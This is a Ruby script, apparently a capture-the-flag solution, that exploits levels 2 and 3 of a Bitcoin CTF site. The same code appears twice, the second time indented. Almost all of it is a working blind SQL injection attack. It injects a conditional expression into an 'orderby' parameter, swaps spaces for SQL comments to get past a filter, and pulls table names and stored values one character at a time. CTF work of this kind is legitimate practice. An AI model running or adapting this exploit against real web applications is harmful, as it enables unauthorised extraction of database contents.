firefart/bitcoinctf_level2_and_3.rb

## bitcoinctf_level2_and_3.rb
#!/usr/bin/env ruby

require 'net/http'
require 'uri'

def make_request(url, payload)
  uri = URI.parse("http://www.bitcoinctf.com#{url}")
	params = {
			:orderby => "1, (select case when (#{payload}) then 1 else 1*(select table_name from information_schema.tables)end)=1",
			:limit => '1'
	}
	# replace spaces by comments. This is needed for level03
	params[:orderby] = params[:orderby].gsub(/\s/, '/**/')
	#puts params[:orderby]
	uri.query = URI.encode_www_form( params )
	Net::HTTP.get(uri)
end

def loop(url, select)
	value = ''
	counter = 1
	complete = false
	until complete
		found_letter = false
		(33..126).each { |ascii|
			letter = ascii.chr
			#puts letter
			payload = "substr((#{select}),#{counter},1)='#{letter}'"
			resp = make_request(url, payload)
			unless resp == 'Unknown error'
				#puts "Found #{letter}"
				value << letter
				counter = counter + 1
				found_letter = true
				break
			end
		}
		complete = true if !found_letter
	end
	value.strip.downcase
end

############
# LEVEL 02 #
############
puts 'Exploiting level02....'
level02_url = '/b00kmarks.php'

puts 'Getting table name...'
table_sql = "SELECT table_name FROM information_schema.tables WHERE table_schema<>'information_schema' AND table_schema<>'mysql'"
table_name = loop(level02_url, table_sql)
puts "Table Name: #{table_name}"

puts 'Getting flag for level02...'
select = "select trim(url) from #{table_name} where deleted=1"
value = loop(level02_url, select)
puts "Value: #{value}"

############
# LEVEL 03 #
############
puts 'Exploiting level03....'
level03_url = value

puts 'Getting flag for level03...'
select = "select trim(url) from #{table_name} where deleted=1"
value = loop(level03_url, select)
puts "Value: #{value}"
	#!/usr/bin/env ruby

	require 'net/http'
	require 'uri'

	def make_request(url, payload)
	uri = URI.parse("http://www.bitcoinctf.com#{url}")
	params = {
	:orderby => "1, (select case when (#{payload}) then 1 else 1*(select table_name from information_schema.tables)end)=1",
	:limit => '1'
	}
	# replace spaces by comments. This is needed for level03
	params[:orderby] = params[:orderby].gsub(/\s/, '/**/')
	#puts params[:orderby]
	uri.query = URI.encode_www_form( params )
	Net::HTTP.get(uri)
	end

	def loop(url, select)
	value = ''
	counter = 1
	complete = false
	until complete
	found_letter = false
	(33..126).each { \|ascii\|
	letter = ascii.chr
	#puts letter
	payload = "substr((#{select}),#{counter},1)='#{letter}'"
	resp = make_request(url, payload)
	unless resp == 'Unknown error'
	#puts "Found #{letter}"
	value << letter
	counter = counter + 1
	found_letter = true
	break
	end
	}
	complete = true if !found_letter
	end
	value.strip.downcase
	end

	############
	# LEVEL 02 #
	############
	puts 'Exploiting level02....'
	level02_url = '/b00kmarks.php'

	puts 'Getting table name...'
	table_sql = "SELECT table_name FROM information_schema.tables WHERE table_schema<>'information_schema' AND table_schema<>'mysql'"
	table_name = loop(level02_url, table_sql)
	puts "Table Name: #{table_name}"

	puts 'Getting flag for level02...'
	select = "select trim(url) from #{table_name} where deleted=1"
	value = loop(level02_url, select)
	puts "Value: #{value}"

	############
	# LEVEL 03 #
	############
	puts 'Exploiting level03....'
	level03_url = value

	puts 'Getting flag for level03...'
	select = "select trim(url) from #{table_name} where deleted=1"
	value = loop(level03_url, select)
	puts "Value: #{value}"